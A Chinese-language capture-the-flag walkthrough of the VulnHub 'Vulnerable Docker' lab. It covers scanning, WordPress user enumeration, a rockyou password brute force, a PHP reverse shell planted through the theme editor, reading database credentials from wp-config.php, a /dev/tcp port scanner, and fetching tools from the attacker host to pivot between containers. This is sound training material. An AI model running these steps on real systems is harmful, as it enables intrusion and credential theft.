Vulnerable Docker Containment
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:b3:97:4a 1 60 PCS Systemtechnik GmbH
192.168.56.150 08:00:27:d5:51:8d 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.150
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.150 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-04 22:03 EDT
Nmap scan report for bogon (192.168.56.150)
Host is up (0.000089s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)
| 2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)
| 256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)
|_ 256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)
8000/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.10 (Debian)
|_http-generator: WordPress 4.8.1
|_http-title: NotSoEasy Docker – Just another WordPress site
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
MAC Address: 08:00:27:D5:51:8D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.41 seconds
Get Access
用浏览器访问目标主机的8000端口,为wordpress站点。
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ curl http://192.168.56.150:8000/robots.txt
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ nikto -h http://192.168.56.150:8000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.150
+ Target Hostname: 192.168.56.150
+ Target Port: 8000
+ Start Time: 2022-11-04 22:08:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Retrieved x-powered-by header: PHP/5.6.31
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.56.150/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/wp-admin/admin-ajax.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
^C
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ gobuster dir -u http://192.168.56.150:8000 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.150:8000
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/04 22:11:00 Starting gobuster in directory enumeration mode
===============================================================
/about (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/about/]
/contact (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/contact/]
/blog (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/blog/]
/home (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/home/]
/rss (Status: 200) [Size: 2402]
/login (Status: 302) [Size: 0] [--> http://192.168.56.150:8000/wp-login.php]
/0 (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/0/]
/feed (Status: 200) [Size: 17992]
/atom (Status: 200) [Size: 20055]
/s (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/sample-page/]
/b (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/blog/]
/a (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/a-homepage-section/]
/c (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/contact/]
/wp-content (Status: 301) [Size: 328] [--> http://192.168.56.150:8000/wp-content/]
/p (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/post-6/]
/admin (Status: 302) [Size: 0] [--> http://192.168.56.150:8000/wp-admin/]
/post (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/post-6/]
/h (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/2017/08/19/hello-world/]
/rss2 (Status: 200) [Size: 17992]
/wp-includes (Status: 301) [Size: 329] [--> http://192.168.56.150:8000/wp-includes/]
/page2 (Status: 200) [Size: 61436]
/bl (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/blog/]
/sa (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/sample-page/]
/rdf (Status: 200) [Size: 16332]
/page1 (Status: 200) [Size: 71444]
/sample (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/sample-page/]
/co (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/contact/]
/page3 (Status: 200) [Size: 61563]
/page4 (Status: 200) [Size: 61611]
/page5 (Status: 200) [Size: 61603]
/page6 (Status: 200) [Size: 61591]
/dashboard (Status: 302) [Size: 0] [--> http://192.168.56.150:8000/wp-admin/]
/he (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/2017/08/19/hello-world/]
/page7 (Status: 200) [Size: 61591]
Progress: 3460 / 207644 (1.67%)^C
[!] Keyboard interrupt detected, terminating.
[ERROR] 2022/11/04 22:12:11 [!] context canceled
===============================================================
2022/11/04 22:12:11 Finished
===============================================================
没有特别大的收获,由于NMAP扫描结果表明目标主机运行wordpress站点,因此接下来用wpscan扫描一下有无漏洞?
──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ wpscan --url http://192.168.56.150:8000 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.150:8000/ [192.168.56.150]
[+] Started: Fri Nov 4 22:13:53 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.10 (Debian)
| - X-Powered-By: PHP/5.6.31
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.150:8000/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.150:8000/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.150:8000/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.150:8000/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8.1 identified (Insecure, released on 2017-08-02).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.150:8000/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
| - http://192.168.56.150:8000/comments/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://192.168.56.150:8000/wp-content/themes/twentyseventeen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.150:8000/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://192.168.56.150:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.150:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1, Match: 'Version: 1.3'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] bob
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.150:8000/wp-json/wp/v2/users/?per_page=100&page=1
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Nov 4 22:13:57 2022
[+] Requests Done: 62
[+] Cached Requests: 18
[+] Data Sent: 16.185 KB
[+] Data Received: 1.179 MB
[+] Memory used: 259.117 MB
[+] Elapsed time: 00:00:03
识别出来用户bob,看能不能用wpscan工具本身破解其密码:
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ wpscan --url http://192.168.56.150:8000 -U bob -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.150:8000/ [192.168.56.150]
[+] Started: Fri Nov 4 22:15:57 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.10 (Debian)
| - X-Powered-By: PHP/5.6.31
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.150:8000/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.150:8000/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.150:8000/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.150:8000/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8.1 identified (Insecure, released on 2017-08-02).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.150:8000/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
| - http://192.168.56.150:8000/comments/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://192.168.56.150:8000/wp-content/themes/twentyseventeen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.150:8000/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://192.168.56.150:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.150:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1, Match: 'Version
: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
Trying bob / Welcome1 Time: 00:08:19 <> (40397 / 14384792) 0.28% ETA: 49:18Trying bob / aaron5 Time: 00:08:19 <> (40400 / 14384792) 0.28% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: bob, Password: Welcome1
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Nov 4 22:24:23 2022
[+] Requests Done: 40542
[+] Cached Requests: 38
[+] Data Sent: 20.883 MB
[+] Data Received: 24.873 MB
[+] Memory used: 258.121 MB
[+] Elapsed time: 00:08:25
用户(bob Welcome1)登录wordpress管理后台
接下来需要上传php反向shell脚本到目标站点,可通过编辑主题
──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ cp ~/Tools/php_reverse_shell/php-reverse-shell-1.0/php-reverse-shell.php .
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls
nmap_full_scan php-reverse-shell.php
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ mv php-reverse-shell.php shell.php
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ vim shell.php
Appearnce->Editor->404 Template
然后将php shell脚本代码拷贝替换,点击Update file
访问404页面(具体位置可以首先查看首页源代码,找到wp-content/themes/twentyseventeen, twentyseventeen还是别的,需要看目标站点实际的采用那种主题)
在Kali Linux上成功拿到了目标主机的shell:
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.150] 40990
Linux 8f4bca8ef241 3.13.0-128-generic #177-Ubuntu SMP Tue Aug 8 11:40:23 UTC 2017 x86_64 GNU/Linux
02:42:12 up 43 min, 0 users, load average: 0.00, 0.11, 0.73
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
$ bash -i
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@8f4bca8ef241:/$ pwd
pwd
/
www-data@8f4bca8ef241:/$
从shell提示符可以知道,目前得到的shell是在container里。
www-data@8f4bca8ef241:/$ cd /var/www
cd /var/www
www-data@8f4bca8ef241:/var/www$ ls -alh
ls -alh
total 12K
drwxr-xr-x 4 root root 4.0K Jul 24 2017 .
drwxr-xr-x 33 root root 4.0K Aug 4 2017 ..
drwxr-xr-x 5 www-data www-data 4.0K Nov 5 01:58 html
www-data@8f4bca8ef241:/var/www$ cd html
cd html
www-data@8f4bca8ef241:/var/www/html$ ls -alh
ls -alh
total 204K
drwxr-xr-x 5 www-data www-data 4.0K Nov 5 01:58 .
drwxr-xr-x 4 root root 4.0K Jul 24 2017 ..
-rw-r--r-- 1 www-data www-data 235 Aug 19 2017 .htaccess
-rw-r--r-- 1 www-data www-data 418 Sep 25 2013 index.php
-rw-r--r-- 1 www-data www-data 20K Jan 2 2017 license.txt
-rw-r--r-- 1 www-data www-data 7.3K Dec 12 2016 readme.html
-rw-r--r-- 1 www-data www-data 5.4K Sep 27 2016 wp-activate.php
drwxr-xr-x 9 www-data www-data 4.0K Aug 2 2017 wp-admin
-rw-r--r-- 1 www-data www-data 364 Dec 19 2015 wp-blog-header.php
-rw-r--r-- 1 www-data www-data 1.6K Aug 29 2016 wp-comments-post.php
-rw-r--r-- 1 www-data www-data 2.7K Nov 5 01:58 wp-config-sample.php
-rw-r--r-- 1 root root 3.3K Nov 5 01:58 wp-config.php
drwxr-xr-x 6 www-data www-data 4.0K Nov 5 02:36 wp-content
-rw-r--r-- 1 www-data www-data 3.3K May 24 2015 wp-cron.php
drwxr-xr-x 18 www-data www-data 12K Aug 2 2017 wp-includes
-rw-r--r-- 1 www-data www-data 2.4K Nov 21 2016 wp-links-opml.php
-rw-r--r-- 1 www-data www-data 3.3K Oct 25 2016 wp-load.php
-rw-r--r-- 1 www-data www-data 34K May 12 2017 wp-login.php
-rw-r--r-- 1 www-data www-data 7.9K Jan 11 2017 wp-mail.php
-rw-r--r-- 1 www-data www-data 16K Apr 6 2017 wp-settings.php
-rw-r--r-- 1 www-data www-data 30K Jan 24 2017 wp-signup.php
-rw-r--r-- 1 www-data www-data 4.5K Oct 14 2016 wp-trackback.php
-rw-r--r-- 1 www-data www-data 3.0K Aug 31 2016 xmlrpc.php
www-data@8f4bca8ef241:/var/www/html$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'wordpress');
/** MySQL database password */
define('DB_PASSWORD', 'WordPressISBest');
/** MySQL hostname */
define('DB_HOST', 'db:3306');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '853e970525ab9be27353b4e47e1c7ae74bad6edd');
define('SECURE_AUTH_KEY', 'db109c684d50566b803837fda86203730fb36cea');
define('LOGGED_IN_KEY', '8a0301ce6a8b14a1e15439c1e9cf9c791e5e9157');
define('NONCE_KEY', 'ff187d8251216e06badd61b867c83651c6214ec4');
define('AUTH_SALT', 'd2ca4470f040f6fc2e7336b2c1ea78eacfd6b305');
define('SECURE_AUTH_SALT', 'e35d8bd5577557d947c6e98c510107207d52941e');
define('LOGGED_IN_SALT', '733de3cb7cec9d21c9d77844bacadc1a098a15b4');
define('NONCE_SALT', 'f6af597be5e1f770dfaf3a68f91898b9aada2774');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
// If we're behind a proxy server and using HTTPS, we need to alert Wordpress of that fact
// see also http://codex.wordpress.org/Administration_Over_SSL#Using_a_Reverse_Proxy
if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
$_SERVER['HTTPS'] = 'on';
}
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
define( 'WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] );
define( 'WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] );
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
www-data@8f4bca8ef241:/var/www/html$
这里有数据库的用户名和密码信息。
www-data@8f4bca8ef241:/var/www/html$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
5: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.2/16 scope global eth0
valid_lft forever preferred_lft forever
这是container内部的IP地址
ping一下这个172.18.0.0还有什么主机
ww-data@8f4bca8ef241:/$ ping -c 1 172.18.0.3
ping -c 1 172.18.0.3
PING 172.18.0.3 (172.18.0.3): 56 data bytes
64 bytes from 172.18.0.3: icmp_seq=0 ttl=64 time=0.050 ms
--- 172.18.0.3 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.050/0.050/0.050/0.000 ms
www-data@8f4bca8ef241:/$ ping -c 1 172.18.0.4
ping -c 1 172.18.0.4
PING 172.18.0.4 (172.18.0.4): 56 data bytes
64 bytes from 172.18.0.4: icmp_seq=0 ttl=64 time=0.062 ms
--- 172.18.0.4 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.062/0.062/0.062/0.000 ms
www-data@8f4bca8ef241:/$ ping -c 1 172.18.0.1
ping -c 1 172.18.0.1
PING 172.18.0.1 (172.18.0.1): 56 data bytes
64 bytes from 172.18.0.1: icmp_seq=0 ttl=64 time=0.043 ms
--- 172.18.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.043/0.043/0.043/0.000 ms
编写shell脚本在container里运行探测172.18.0.1/2/3/4有哪些开放端口
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ cat shell.sh
#!/bin/bash
hosts=(
"172.18.0.1"
"172.18.0.2"
"172.18.0.3"
"172.18.0.4"
)
END=65535
for host in "${hosts[@]}"
do
echo "========================================"
echo "Scanning $host"
echo "========================================"
for ((port=1; port<END;port++))
do
echo "" > /dev/tcp/$host/$port && echo "port $port is open"
done 2>/dev/null
done
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$
可以在Kali Linux本地编辑好shell.sh文件,然后通过python的web模块上传到目标主机(container)
运行shell.sh脚本:
www-data@8f4bca8ef241:/tmp$ curl -O http://192.168.56.137:8000/shell.sh
curl -O http://192.168.56.137:8000/shell.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 447 100 447 0 0 80265 0 --:--:-- --:--:-- --:--:-- 89400
www-data@8f4bca8ef241:/tmp$ ls
ls
shell.sh
www-data@8f4bca8ef241:/tmp$ chmod +x shell.sh
chmod +x shell.sh
www-data@8f4bca8ef241:/tmp$ ./shell.sh
./shell.sh
========================================
Scanning 172.18.0.1
========================================
port 22 is open
port 8000 is open
========================================
Scanning 172.18.0.2
========================================
port 80 is open
port 44977 is open
========================================
Scanning 172.18.0.3
========================================
port 3306 is open
========================================
Scanning 172.18.0.4
========================================
port 22 is open
port 8022 is open
www-data@8f4bca8ef241:/tmp$
发现172.18.0.4上有8022端口
www-data@8f4bca8ef241:/tmp$ curl -s 172.18.0.4:8022
curl -s 172.18.0.4:8022
<!DOCTYPE html>
<html style="height:100%; !important;">
<head>
<title>Docker-SSH</title>
<script src="/js/jquery-1.11.3.min.js"></script>
<script src="/js/term.js"></script>
<link rel="stylesheet" href="/css/term.css" type="text/css" />
</head>
<body>
<script type="text/javascript">
computeMaxTerminalSize = function(){
rows = Math.round($(window).height() / 14);
cols = Math.round($(window).width() / 6.8);
return {cols: cols, rows: rows};
};
var connectionId, doneResizing, evt, term;
connectionId = null;
termSize = computeMaxTerminalSize()
term = new Terminal({
cols: termSize.cols,
rows: termSize.rows,
useStyle: true,
screenKeys: true,
cursorBlink: true
});
evt = new EventSource("/api/v1/terminal/stream/");
evt.addEventListener('connectionId', function(event) {
connectionId = event.data;
term.write("Connection established\r\n");
doneResizing();
});
evt.addEventListener('data', function(event) {
console.log('data', event);
term.write(JSON.parse(event.data));
});
evt.addEventListener('exit', function() {
evt.close();
term.write("\r\nTerminal exited.");
});
evt.addEventListener('error', function() {
evt.close();
term.write("\r\nTerminal exited.");
});
term.on('data', function(data) {
if (evt.readyState === EventSource.OPEN) {
$.post("/api/v1/terminal/send/" + connectionId, {data: data});
}
});
term.on('title', function(title) {
document.title = title;
});
term.open(document.body);
window.onresize = function(event) {
clearTimeout(this.id);
this.id = setTimeout(doneResizing, 500);
};
doneResizing = function() {
maxTermSize = computeMaxTerminalSize();
$.post(
"/api/v1/terminal/resize-window/" + connectionId,
maxTermSize,
function(data){
if(data && data.cols && data.rows){
term.resize(data.cols, data.rows);
}
}
);
};
</script>
</body>
</html>
从Title可以知道,172.18.0.4运行docker-ssh
接下来需要打通隧道(通过端口转发)
这个时候需要做端口转发打通隧道进行通信,下载openssh.deb文件,利用这个文件的里面的ssh和ssh-keygen命令生成秘钥跟kali打通隧道,然后通过web浏览器访问,下载地址:http://http.us.debian.org/debian/pool/main/o/openssh/openssh-client_6.7p1-5+deb8u4_amd64.deb
因为靶机配置为host-only模式,因此无法直接从互联网下载,可以先下载到Kali Linux,然后上传到靶机:
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ wget http://http.us.debian.org/debian/pool/main/o/openssh/openssh-client_6.7p1-5+deb8u4_amd64.deb
--2022-11-04 23:51:12-- http://http.us.debian.org/debian/pool/main/o/openssh/openssh-client_6.7p1-5+deb8u4_amd64.deb
Resolving http.us.debian.org (http.us.debian.org)... 208.80.154.139, 2600:3404:200:237::2, 2600:3402:200:227::2, ...
Connecting to http.us.debian.org (http.us.debian.org)|208.80.154.139|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 692514 (676K) [application/vnd.debian.binary-package]
Saving to: ‘openssh-client_6.7p1-5+deb8u4_amd64.deb’
openssh-client_6.7p 100%[================>] 676.28K 513KB/s in 1.3s
2022-11-04 23:51:14 (513 KB/s) - ‘openssh-client_6.7p1-5+deb8u4_amd64.deb’ saved [692514/692514]
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls
nmap_full_scan openssh-client_6.7p1-5+deb8u4_amd64.deb shell.php shell.sh
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ mv openssh-client_6.7p1-5+deb8u4_amd64.deb openssh.deb
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.150 - - [04/Nov/2022 23:51:48] "GET /openssh.deb HTTP/1.1" 200 -
www-data@8f4bca8ef241:/tmp$ curl -O http://192.168.56.137:8000/openssh.deb
curl -O http://192.168.56.137:8000/openssh.deb
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 676k 100 676k 0 0 85.1M 0 --:--:-- --:--:-- --:--:-- 94.3M
www-data@8f4bca8ef241:/tmp$ ls
ls
openssh.deb
shell.sh
www-data@8f4bca8ef241:/tmp$
但是执行失败:
www-data@8f4bca8ef241:/tmp$ dpkg -i openssh.deb
dpkg -i openssh.deb
dpkg: error: requested operation requires superuser privilege
www-data@8f4bca8ef241:/tmp$
